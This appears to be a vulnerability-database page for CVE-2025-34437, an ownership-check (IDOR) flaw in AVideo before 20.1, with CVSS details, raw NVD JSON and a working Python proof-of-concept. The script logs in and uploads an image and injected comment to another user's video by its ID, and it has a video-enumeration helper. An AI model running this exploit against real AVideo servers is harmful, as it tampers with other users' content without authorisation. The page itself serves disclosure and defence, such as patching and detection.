Security Vulnerability Report
CVE-2025-34437 CVSS 8.8 HIGH

CVE-2025-34437

Published: 2025-12-17 20:15:54
Last Modified: 2025-12-19 19:15:51

Description

AVideo versions prior to 20.1 permit any authenticated user to upload comment images to videos owned by other users. The endpoint validates authentication but omits ownership checks, allowing attackers to perform unauthorized uploads to arbitrary video objects.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
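AVideo < 20.1 (the bound given in the description; the CPE match criteria in the raw JSON below list versionEndExcluding 20.0, so a scanner keyed on the CPE data alone will not flag version 20.0 even though the description counts it as affected)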

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
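import requests
import json
import sys

# CVE-2025-34437 PoC - AVideo IDOR Arbitrary Comment Image Upload
# This PoC demonstrates uploading a comment image to a victim video
#
# Root cause, per the advisory text: the comment-image upload endpoint checks
# that the caller is authenticated but not that the caller owns the video named
# in the request (CWE-639). The advisory gives 20.1 as the first fixed version;
# the fix belongs on the server, as an ownership/authorization check on the
# video id before the upload is accepted.


class AVideoExploit:
    """Authenticated client that reproduces the missing ownership check.

    Holds one requests.Session so the cookie obtained by login() is reused by
    the later calls.
    """

    def __init__(self, target_url, username, password):
        """Store the target base URL (trailing slash stripped) and credentials."""
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        self.session = requests.Session()
        self.logged_in = False

    def login(self):
        """Authenticate to AVideo platform.

        Returns:
            True when the login POST answered with HTTP 200, otherwise False.
        """
        login_url = f"{self.target_url}/?login"
        data = {
            'user': self.username,
            'pass': self.password
        }
        try:
            response = self.session.post(login_url, data=data, timeout=10)
            # NOTE(review): HTTP 200 is the only success signal used here. If
            # the application also answers 200 for rejected credentials, this
            # reports a false positive - confirm against the response body.
            if response.status_code == 200:
                self.logged_in = True
                print(f"[+] Successfully logged in as {self.username}")
                return True
            print(f"[-] Login failed: HTTP {response.status_code}")
        except Exception as e:
            print(f"[-] Login failed: {e}")
        return False

    def upload_comment_image(self, video_id, image_path):
        """Upload a comment image to a video the session user need not own.

        Args:
            video_id: Target video ID (a video owned by another account).
            image_path: Path to the image file to upload.

        Returns:
            True when the endpoint answered HTTP 200 with a truthy ``status``
            field in its JSON body, otherwise False.
        """
        if not self.logged_in:
            print("[-] Not logged in. Please login first.")
            return False

        # API endpoint for comment image upload (may vary)
        upload_url = f"{self.target_url}/objects/videoCommentAdd.json.php"
        try:
            with open(image_path, 'rb') as f:
                files = {
                    'file': ('malicious.png', f, 'image/png')
                }
                data = {
                    # IDOR: the id is caller-supplied and, on affected
                    # versions, accepted without an ownership check.
                    # Server-side, the observable is a comment-image POST
                    # whose videos_id belongs to a different account than the
                    # session user.
                    'videos_id': video_id,
                    'comment': 'Injected comment via IDOR'
                }
                response = self.session.post(upload_url, data=data, files=files, timeout=10)
            if response.status_code == 200:
                result = response.json()
                if result.get('status'):
                    print(f"[+] Successfully uploaded image to video ID: {video_id}")
                    print(f"[+] Comment ID: {result.get('comment_id', 'N/A')}")
                    return True
                else:
                    print(f"[-] Upload failed: {result.get('msg', 'Unknown error')}")
            else:
                # A patched server is expected to refuse the request; report
                # the status instead of failing silently.
                print(f"[-] Upload failed: HTTP {response.status_code}")
        except FileNotFoundError:
            print(f"[-] Image file not found: {image_path}")
        except Exception as e:
            print(f"[-] Upload failed: {e}")
        return False

    def enumerate_videos(self, limit=10):
        """Enumerate accessible video IDs.

        Not called by main(). Returns the ``id`` of each entry in the
        ``videos`` list of the JSON response, or an empty list on any failure.
        """
        api_url = f"{self.target_url}/objects/videos.json.php"
        try:
            response = self.session.get(api_url, params={'page': 1, 'limit': limit}, timeout=10)
            if response.status_code == 200:
                data = response.json()
                videos = data.get('videos', [])
                print(f"[+] Found {len(videos)} videos")
                return [v.get('id') for v in videos]
        except Exception as e:
            print(f"[-] Enumeration failed: {e}")
        return []


def main():
    """Parse the five positional arguments, log in, and run the upload check."""
    # Five arguments are required, so argv must hold six entries including the
    # script name. The original `< 5` test let a four-argument call through
    # and then crashed with IndexError on sys.argv[5].
    if len(sys.argv) < 6:
        print("Usage: python cve-2025-34437.py <target_url> <username> <password> <video_id> <image_path>")
        print("Example: python cve-2025-34437.py http://target.com user pass 123 malicious.png")
        sys.exit(1)

    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    video_id = sys.argv[4]
    image_path = sys.argv[5]

    exploit = AVideoExploit(target, username, password)
    if exploit.login():
        print(f"[*] Exploiting IDOR vulnerability on video ID: {video_id}")
        exploit.upload_comment_image(video_id, image_path)


if __name__ == "__main__":
    main()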

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34437", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:54.150", "lastModified": "2025-12-19T19:15:51.223", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 permit any authenticated user to upload comment images to videos owned by other users. The endpoint validates authentication but omits ownership checks, allowing attackers to perform unauthorized uploads to arbitrary video objects."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/d411f91805", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-idor-arbitrary-comment-image-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}